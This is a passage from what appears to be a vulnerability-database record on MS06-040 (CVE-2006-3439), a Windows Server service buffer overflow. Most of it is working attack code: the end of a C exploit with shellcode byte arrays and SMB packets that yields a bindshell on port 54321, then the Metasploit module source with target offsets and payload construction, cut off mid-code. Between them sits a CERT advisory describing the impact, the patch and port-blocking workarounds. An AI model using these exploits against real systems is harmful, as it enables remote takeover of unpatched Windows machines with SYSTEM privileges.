0x00, 0x63, \r\n0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, \r\n0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, \r\n0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, \r\n0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, \r\n0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, \r\n0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, \r\n0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, \r\n0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, \r\n0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, \r\n0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, \r\n0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, \r\n0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, \r\n0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, \r\n0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, \r\n0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, \r\n0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, \r\n0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 
0xb9, \r\n0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, \r\n0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, \r\n0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, \r\n0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, \r\n0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, \r\n0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, \r\n0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, \r\n0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, \r\n0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, \r\n0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, \r\n0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, \r\n0x7c, 0x45, 0x8e };\r\n\r\nchar peer0_12[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, \r\n0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, \r\n0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, \r\n0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, \r\n0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, \r\n0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, \r\n0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, \r\n0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, \r\n0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, \r\n0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, \r\n0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, \r\n0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, \r\n0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, \r\n0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, \r\n0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, \r\n0x16, 0xfb, 
0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, \r\n0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, \r\n0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, \r\n0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, \r\n0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, \r\n0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, \r\n0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, \r\n0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, \r\n0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, \r\n0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, \r\n0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, \r\n0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, \r\n0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, \r\n0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, \r\n0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, \r\n0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, \r\n0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, \r\n0x52, 0x66, 0x79 };\r\n\r\nchar peer0_13[] = {\r\n0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, \r\n0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, \r\n0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, \r\n0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, \r\n0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, \r\n0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, \r\n0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, \r\n0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, \r\n0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, \r\n0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, \r\n0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, \r\n0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, \r\n0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, \r\n0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, \r\n0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, \r\n0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 
0x62, 0x36, \r\n0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, \r\n0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, \r\n0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, \r\n0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, \r\n0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, \r\n0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, \r\n0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, \r\n0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, \r\n0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, \r\n0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, \r\n0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, \r\n0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, \r\n0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, \r\n0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, \r\n0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, \r\n0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, \r\n0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, \r\n0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, \r\n0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, \r\n0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, \r\n0x00, 0x00, 0x00 };\r\n\r\nchar peer0_14[] = {\r\n0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, \r\n0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, \r\n0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, \r\n0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \r\n0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, \r\n0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, \r\n0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, \r\n0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, \r\n0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, \r\n0x00, 0x00 };\r\n\r\n\r\nint main(int argc,char **argv)\r\n{\r\n\r\nint fd;\r\nint con;\r\nint 
repbf[20000];\r\n\r\nstruct sockaddr_in target;\r\n\r\n\r\nif(argc < 2)\r\n{\r\n\r\nprintf(\"Microsoft Windows CanonicalizePathName() Remote Exploit (MS06-040)\\n\");\r\nprintf(\"Tested on WindowsXP SP1 EN and got a bindshell on port 54321\\n\");\r\nprintf(\"Win2k should give a crash in services.exe\\n\");\r\nprintf(\"I've used the default smbdomain: WORKGROUP\\n\\n\");\r\nprintf(\"Usage: %s <ip>\\n\",argv[0]);\r\nprintf(\"Example: %s 192.168.1.103\\n\\n\",argv[0]);\r\nprintf(\"Written by: Preddy\\n\");\r\nprintf(\"RootShell Security Group\\n\");\r\nprintf(\"www.team-rootshell.com\\n\");\r\n\r\nexit(1);\r\n\r\n}\r\n\r\nfd = socket(AF_INET,SOCK_STREAM,0);\r\n\r\nif(fd < 0)\r\n{\r\n\r\nperror(\"Could not create socket\\n\");\r\nexit(1);\r\n}\r\n\r\nprintf(\"Target: %s\\n\",argv[1]);\r\n\r\ntarget.sin_family = AF_INET;\r\ntarget.sin_addr.s_addr = inet_addr(argv[1]);\r\ntarget.sin_port = htons(PORT);\r\n\r\ncon = connect(fd,(struct sockaddr_in *)&target,sizeof(target));\r\n\r\nif(con < 0)\r\n{\r\n\r\nprintf(\"Could not 
connect\\n\");\r\nexit(1);\r\n}\r\n\r\nsendto(fd,peer0_0,sizeof(peer0_0),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_1,sizeof(peer0_1),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_2,sizeof(peer0_2),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_3,sizeof(peer0_3),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_4,sizeof(peer0_4),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_5,sizeof(peer0_5),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_6,sizeof(peer0_6),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_7,sizeof(peer0_7),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_8,sizeof(peer0_8),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_9,sizeof(peer0_9),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_10,sizeof(peer0_10),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_11,sizeof(peer0_11),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_12,sizeof(peer0_12),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_13,sizeof(peer0_13),0,&target,sizeof(target));\r\nread(fd,repbf,sizeof(repbf));\r\nsendto(fd,peer0_14,sizeof(peer0_14),0,&target,sizeof(target));\r\n\r\nprintf(\"Attack Finished: now open a new terminal and nc to your victim on port 54321\\n\");\r\nprintf(\"Warning: Don't close this window!\\n\");\r\n\r\nread(fd,repbf,sizeof(repbf));\r\n\r\nprintf(\"Done..\\n\");\r\n\r\nclose(fd);\r\n\r\n}\r\n\r\n// milw0rm.com [2006-08-19]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/2223/"}], "cert": [{"lastseen": "2018-12-25T20:19:16", "bulletinFamily": "info", 
"description": "### Overview \n\nA stack-based buffer overflow exists in the Microsoft Server service. This vulnerability may allow a remote, unauthenticated attacker to execute arbitrary code with `SYSTEM` privileges.[](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/microsoft_rpc_model.asp>)\n\n### Description \n\n**Microsoft Server Service**\n\n[MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>) includes the following information: \n \n_The Server service provides RPC support, file print support and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC. _ \n**Microsoft Remote Procedure Call (MS RPC) and Server Message Block (SMB)** \n \nRPC [](<http://msdn.microsoft.com/library/default.asp?url=/library/en-us/rpc/rpc/microsoft_rpc_model.asp>)provides a mechanism that allows a program to execute a procedure on a remote system in a way that is transparent to the calling program. MS RPC is the Microsoft implementation of RPC. Windows services that use MS RPC may use SMB named pipes as the transport service for MS RPC calls. \n \n**The Problem** \n \nA stack-based buffer overflow exists in the Microsoft Server service. If a remote attacker sends a specially crafted packet to a vulnerable Windows system, that attacker may be able to trigger the buffer overflow. \n \nNote that we have received reports that this vulnerability is actively being exploited. \n \nMore information, including a list of affected versions of Windows, is available in Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). We have confirmed that this vulnerability affects Windows NT4. 
However, according to Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>): \n \n_Windows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following _[_Microsoft Support Lifecycle Web site_](<http://go.microsoft.com/fwlink/?LinkId=21742>)_. For more information about the extended security update support period for these operating system versions, visit the _[_Microsoft Product Support Services Web site_](<http://go.microsoft.com/fwlink/?LinkId=33328>)_. _ \nWindows NT4 users should observe the workarounds below as well as the recommendations in the [Microsoft Windows NT 4.0 and Windows 98 Threat Mitigation Guide](<http://www.microsoft.com/technet/security/topics/networksecurity/threatmi.mspx>)**.** \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with `SYSTEM` privileges. \n \n--- \n \n### Solution \n\n**Apply a patch from Microsoft**\n\nMicrosoft addresses this vulnerability with the updates listed in Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n \nMicrosoft has released a new version of Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/Bulletin/MS06-040.mspx>) and the associated security updates. The new version corrects the problem described in Microsoft Knowledge Base Article [921883](<http://support.microsoft.com/kb/921883>). 
Programs that request large amounts of contiguous memory running on Windows Server 2003 SP1 and Windows XP Professional x64 Edition systems with the previous version of the MS06-040 update installed could crash. \n \n--- \n \nUntil a patch can be applied, the following actions may reduce the chances of exploitation:\n\n \n**Block or Restrict Access** \n \nBlock access to SMB services (139/tcp, 445/tcp) from untrusted networks such as the Internet. \n \n**Restrict anonymous access** \n \nRestrict anonymous SMB access. See Microsoft Knowledge Base Article [246261](<http://support.microsoft.com/support/kb/articles/Q246/2/61.asp>) for information about configuring anonymous access in Windows 2000. Note that this will not prevent authenticated users from exploiting this vulnerability, and it may have adverse effects in mixed-mode domains. Anonymous SMB access to SAM accounts is restricted in Windows XP and Windows Server 2003 by default. \n \nOther workarounds are available in Microsoft Security Bulletin [MS06-040](<http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>). \n \n--- \n \n### Vendor Information\n\n650769\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### __ Microsoft Corporation \n\nUpdated: August 03, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx>\n * <http://support.microsoft.com/kb/246261/>\n * <http://support.microsoft.com/kb/328459/>\n * <http://blogs.technet.com/msrc/archive/2006/08/15/446848.aspx>\n * <http://www.microsoft.com/technet/security/topics/networksecurity/threatmi.mspx>\n\n### Credit\n\nThis vulnerability was reported in Microsoft Security Bulletin MS06-040 \n\nThis document was written by Jeff Gennari. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-3439](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3439>) \n---|--- \n**Severity Metric:****** | 58.28 \n**Date Public:** | 2006-08-08 \n**Date First Published:** | 2006-08-08 \n**Date Last Updated: ** | 2006-09-18 17:19 UTC \n**Document Revision: ** | 81 \n", "modified": "2006-09-18T17:19:00", "published": "2006-08-08T00:00:00", "id": "VU:650769", "href": "https://www.kb.cert.org/vuls/id/650769", "type": "cert", "title": "Microsoft Windows Server service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-02-11T06:50:24", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. 
This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all SMB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.", "modified": "2017-07-24T13:26:21", "published": "2006-09-13T06:49:39", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS06_040_NETAPI", "href": "", "type": "metasploit", "title": "MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function\n using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that\n other RPC calls could be used to exploit this service. This exploit will result in\n a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt\n will likely result in a complete reboot on Windows 2000 and the termination of all\n SMB-related services on Windows XP. 
The default target for this exploit should succeed\n on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.\n },\n 'Author' =>\n [\n 'hdm'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-3439' ],\n [ 'OSVDB', '27845' ],\n [ 'BID', '19409' ],\n [ 'MSB', 'MS06-040' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n # Technically we can use more space than this, but by limiting it\n # to 370 bytes we can use the same request for all Windows SPs.\n 'Space' => 370,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'DefaultTarget' => 0,\n 'Targets' =>\n [\n [ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)', { } ],\n [ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4',\n {\n 'Offset' => 1000,\n 'Ret' => 0x00020804\n }\n ],\n [ '(wcscpy) Windows XP SP0/SP1',\n {\n 'Offset' => 612,\n 'Ret' => 0x00020804\n }\n ],\n [ '(stack) Windows XP SP1 English',\n {\n 'OffsetA' => 656,\n 'OffsetB' => 680,\n 'Ret' => 0x71ab1d54 # jmp esp @ ws2_32.dll\n }\n ],\n [ '(stack) Windows XP SP1 Italian',\n {\n 'OffsetA' => 656,\n 'OffsetB' => 680,\n 'Ret' => 0x71a37bfb # jmp esp @ ws2_32.dll\n }\n ],\n [ '(wcscpy) Windows 2003 SP0',\n {\n 'Offset' => 612,\n 'Ret' => 0x00020804\n }\n ],\n ],\n\n 'DisclosureDate' => 'Aug 8 2006'))\n\n register_options(\n [\n OptString.new('SMBPIPE', [ true, \"The pipe name to use (BROWSER, SRVSVC)\", 'BROWSER']),\n ])\n\n end\n\n def exploit\n\n connect()\n smb_login()\n\n mytarget = target\n if (not target) or (target.name =~ /Automatic/)\n case smb_peer_os()\n when 'Windows 5.0'\n print_status(\"Detected a Windows 2000 target\")\n mytarget = targets[1]\n\n when 'Windows NT 4.0'\n print_status(\"Detected a Windows NT 4.0 target\")\n mytarget = targets[1]\n\n when 'Windows 5.1'\n begin\n smb_create(\"\\\\SRVSVC\")\n print_status(\"Detected a Windows XP SP0/SP1 target\")\n rescue 
::Rex::Proto::SMB::Exceptions::ErrorCode => e\n if (e.error_code == 0xc0000022)\n print_status(\"Windows XP SP2 is not exploitable\")\n return\n end\n print_status(\"Detected a Windows XP target (unknown patch level)\")\n print_status(\"To exploit this system, \\\"set TARGET 2\\\" and run this exploit again\")\n end\n return\n\n when /Windows Server 2003 (\\d+)$/\n print_status(\"Detected a Windows 2003 SP0 target, but have not confirmed English language\")\n print_status(\"To exploit this system, \\\"set TARGET 5\\\" and run this exploit again\")\n # mytarget = targets[5]\n return\n\n when /Windows Server 2003 (\\d+) Service Pack (\\d+)/\n print_status(\"Windows 2003 SP#{$2} is not exploitable\")\n return\n\n when /Samba/\n print_status(\"Samba is not vulnerable\")\n return\n\n else\n print_status(\"No target detected for #{smb_peer_os()}/#{smb_peer_lm()}...\")\n return\n end\n end\n\n # Specific fixups for Windows NT\n case smb_peer_os()\n when 'Windows NT 4.0'\n print_status(\"Adjusting the SMB/DCERPC parameters for Windows NT\")\n datastore['SMB::pipe_write_min_size'] = 2048\n datastore['SMB::pipe_write_max_size'] = 4096\n end\n\n handle = dcerpc_handle(\n '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',\n 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"]\n )\n\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n #\n # /* Function 0x1f at 0x767e912c */\n # long function_1f (\n # [in] [unique] [string] wchar_t * arg_00,\n # [in] [string] wchar_t * arg_01,\n # [out] [size_is(arg_03)] char * arg_02,\n # [in] [range(0, 64000)] long arg_03,\n # [in] [string] wchar_t * arg_04,\n # [in,out] long * arg_05,\n # [in] long arg_06\n # );\n #\n\n print_status(\"Building the stub data...\")\n stub = ''\n\n case mytarget.name\n\n # This covers NT 4.0 as well\n when /wcscpy.*Windows 2000/\n\n code = make_nops(mytarget['Offset'] - payload.encoded.length) + payload.encoded\n\n path = code + ( [mytarget.ret].pack('V') * 16 ) 
+ \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(250)+1) +\n NDR.UnicodeConformantVaryingStringPreBuilt(\"\\xeb\\x02\\x00\\x00\") +\n NDR.long(rand(250)+1) +\n NDR.long(0)\n\n when /wcscpy.*Windows XP/\n path =\n # Payload goes first\n payload.encoded +\n\n # Padding\n rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\n\n # Land 6 bytes in to bypass garbage (XP SP0)\n [ mytarget.ret + 6 ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(8) +\n\n # Address to write our shellcode (XP SP0)\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(32) +\n\n # Jump straight to shellcode (XP SP1)\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(8) +\n\n # Address to write our shellcode (XP SP1)\n [ mytarget.ret ].pack('V') +\n\n # Padding\n rand_text_alphanumeric(32) +\n\n # Terminate the path\n \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(0xf0)+1) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.long(rand(0xf0)+1) +\n NDR.long(0)\n\n\n when /stack/\n buff = rand_text_alphanumeric(800)\n buff[0, payload.encoded.length] = payload.encoded\n buff[ mytarget['OffsetA'], 4 ] = [mytarget.ret].pack('V')\n buff[ mytarget['OffsetB'], 5 ] = \"\\xe9\" + [ (mytarget['OffsetA'] + 5) * -1 ].pack('V')\n\n path = \"\\\\\\x00\\\\\\x00\" + buff + \"\\x00\\x00\"\n\n stub =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.UnicodeConformantVaryingStringPreBuilt(path) +\n NDR.long(rand(0xf0)+1) +\n NDR.UnicodeConformantVaryingString('') +\n NDR.long(rand(0xf0)+1) +\n NDR.long(0)\n\n\n when /wcscpy.*Windows 2003/\n path =\n # Payload goes first\n payload.encoded +\n\n # Padding\n rand_text_alphanumeric(mytarget['Offset'] - payload.encoded.length) +\n\n # Padding\n 
